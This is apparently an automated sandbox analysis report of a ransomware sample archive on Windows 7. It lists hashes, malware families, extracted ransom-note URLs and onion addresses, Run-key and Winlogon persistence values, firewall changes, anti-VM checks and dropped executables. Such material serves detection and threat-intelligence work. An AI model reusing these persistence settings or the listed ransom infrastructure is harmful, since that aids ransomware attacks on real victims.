Analysis
-
max time kernel
201s -
max time network
277s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 17:43
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00288.7z
Resource
win7-20240903-en
General
-
Target
RNSM00288.7z
-
Size
13.4MB
-
MD5
f44bed2280092b2ab1600098b32f2d4b
-
SHA1
b747e8ef1a04fcbcce623299edbaebc5308327bf
-
SHA256
e64e0e78a07088d7870dd8d4c021be360566cd35f8838e19cfd9efbc8799f17d
-
SHA512
3b51e37a90f345f58a0d272a872dada71eb5b827149a001cf46979e7018036f69ed5baec268bd75d9a18de6e8328c6058200d55537286b1f0a3e3623eb4d99a2
-
SSDEEP
393216:30dEla/6oM6wQcgz5bLXUv6KB3Wn4EUmRtqGKTF6ahmx8wOYt:oEA/cQPhbUv6KJyfqhhmjOS
Malware Config
Extracted
C:\ReadDecryptFilesHere.txt
Extracted
C:\Users\Admin\Pictures\!HELP_SOS.hta
http://'+s.bp
http://'+s.bp+s.txp+tx
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kuuko.txt
http://ytrest84y5i456hghadefdsd.pontogrot.com/32D525B2367AD7EE
http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE
http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE
http://xlowfznrg4wf7dli.onion/32D525B2367AD7EE
http://xlowfznrg4wf7dli.ONION/32D525B2367AD7EE
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+lpoqi.txt
teslacrypt
http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/CE759B2D4C998DF
http://pts764gt354fder34fsqw45gdfsavadfgsfg.kraskula.com/CE759B2D4C998DF
http://yyre45dbvn2nhbefbmh.begumvelic.at/CE759B2D4C998DF
http://xlowfznrg4wf7dli.ONION/CE759B2D4C998DF
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+qiweg.txt
http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE
http://b4youfred5485jgsa3453f.italazudda.com/32D525B2367AD7EE
http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE
http://fwgrhsao3aoml7ej.onion/32D525B2367AD7EE
http://fwgrhsao3aoml7ej.ONION/32D525B2367AD7EE
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+pqnjv.txt
http://t54ndnku456ngkwsudqer.wallymac.com/565D3C565EFC27E
http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/565D3C565EFC27E
http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/565D3C565EFC27E
http://k7tlx3ghr3m4n2tu.onion/565D3C565EFC27E
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+armja.txt
http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/32D525B2367AD7EE
http://kk4dshfjn45tsnkdf34fg.tatiejava.at/32D525B2367AD7EE
http://94375hfsjhbdfkj5wfg.aladadear.com/32D525B2367AD7EE
http://fwgrhsao3aoml7ej.onion/32D525B2367AD7EE
http://fwgrhsao3aoml7ej.ONION/32D525B2367AD7EE
Signatures
-
DcRat 11 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 47384 schtasks.exe 41020 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\B9oBmLC = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\duvwmbl.exe" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\rmpyugx = "C:\\Windows\\system32\\CMD.EXE /c start C:\\Windows\\qbqsfahnmfxr.exe" qbqsfahnmfxr.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\pfjouonwqeua = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\bqsfahnmfxri.exe\"" bqsfahnmfxri.exe 3764 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wmixodiq = "\"C:\\Windows\\isrnabuf.exe\"" explorer.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\14.0\Common 7zFM.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\eubxyltijvie = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\hbuuvsjbfrbv.exe\"" hbuuvsjbfrbv.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\cache.dat" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\skype.dat" svchost.exe -
Dcrat family
-
Locky
Ransomware strain released in 2016, with advanced features like anti-analysis.
-
Locky (Osiris variant)
Variant of the Locky ransomware seen in the wild since early 2017.
-
Locky family
-
Locky_osiris family
-
Luminosity 3 IoCs
Luminosity is a RAT family that was on sale, while claiming to be a system administration utility.
pid Process 3764 schtasks.exe 47384 schtasks.exe 41020 schtasks.exe -
Luminosity family
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\cache.dat" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\skype.dat" svchost.exe -
Modifies firewall policy service 3 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List explorer.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\system32\taskhost.exe = "C:\\Windows\\system32\\taskhost.exe:*:Enabled:Host Process for Windows Tasks" explorer.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\system32\taskhostex.exe = "C:\\Windows\\system32\\taskhostex.exe:*:Enabled:Host Process for Windows Tasks" explorer.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\explorer.exe = "C:\\Windows\\explorer.exe:*:Enabled:Windows Explorer" explorer.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\SysWOW64\explorer.exe = "C:\\Windows\\SysWOW64\\explorer.exe:*:Enabled:Windows Explorer" explorer.exe -
Modiloader family
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 38664 41292 mshta.exe 87 -
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
-
Teslacrypt family
-
Troldesh family
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Contacts a large (8953) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 5 IoCs
resource yara_rule behavioral1/memory/4884-52894-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/4884-52891-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 behavioral1/memory/4884-52845-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/4884-52841-0x0000000000400000-0x000000000043C000-memory.dmp modiloader_stage2 behavioral1/memory/4884-52888-0x0000000001DA0000-0x0000000001E7A000-memory.dmp modiloader_stage2 -
Renames multiple (131) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (380) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (57) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 9456 netsh.exe 4860 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\International\Geo\Nation CTHelpers.exe -
Drops startup file 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kuuko.png hbuuvsjbfrbv.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kuuko.txt hbuuvsjbfrbv.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kuuko.html hbuuvsjbfrbv.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kuuko.png hbuuvsjbfrbv.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kuuko.txt hbuuvsjbfrbv.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kuuko.html hbuuvsjbfrbv.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adf3492f.lnk regsvr32.exe -
Executes dropped EXE 64 IoCs
pid Process 3048 HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe 3060 HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe 1144 HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 1968 Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe 2204 Trojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exe 2416 Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe 468 Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe 1580 Trojan-Ransom.NSIS.Xamyh.agk-625e2c66c2b1e7fb68da887810e453b302beb981e0bcfa8415c076ffb998eb1d.exe 1036 Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe 2260 Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe 2280 Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe 1168 Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe 2428 Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe 2188 Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe 2444 Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe 2164 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 1608 Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe 1588 Trojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exe 1616 Trojan-Ransom.Win32.Zerber.gdcf-7f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de.exe 700 Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe 968 UDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exe 1956 Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe 2052 Trojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exe 2256 Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe 2168 Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe 672 Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1016 Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe 2300 Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe 1836 Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe 796 UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe 1548 UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe 14112 hbuuvsjbfrbv.exe 14428 Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe 33452 geaw.exe 22872 ebicabfbdfbcg.exe 14532 HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe 4884 Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe 16008 CTHelpers.exe 41416 Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe 41368 Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe 40984 Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe 41584 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 41088 UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe 40484 Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe 38476 Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe 38576 HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe 40412 qbqsfahnmfxr.exe 36968 bqsfahnmfxri.exe 36972 Rj3fNWF3.exe 40684 mfxriq.exe 36940 Rj3fNWF3.exe 5512 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 5848 Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe 5708 lpdcqkacfhfo.exe 3672 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 4004 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 27600 Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe 26924 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 26376 Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe 16804 vmsmqjynx.exe 56308 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 35460 Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe -
Loads dropped DLL 64 IoCs
pid Process 1968 Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts explorer.exe -
Accesses Microsoft Outlook profiles 1 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook explorer.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook explorer.exe -
Adds Run key to start application 2 TTPs 16 IoCs
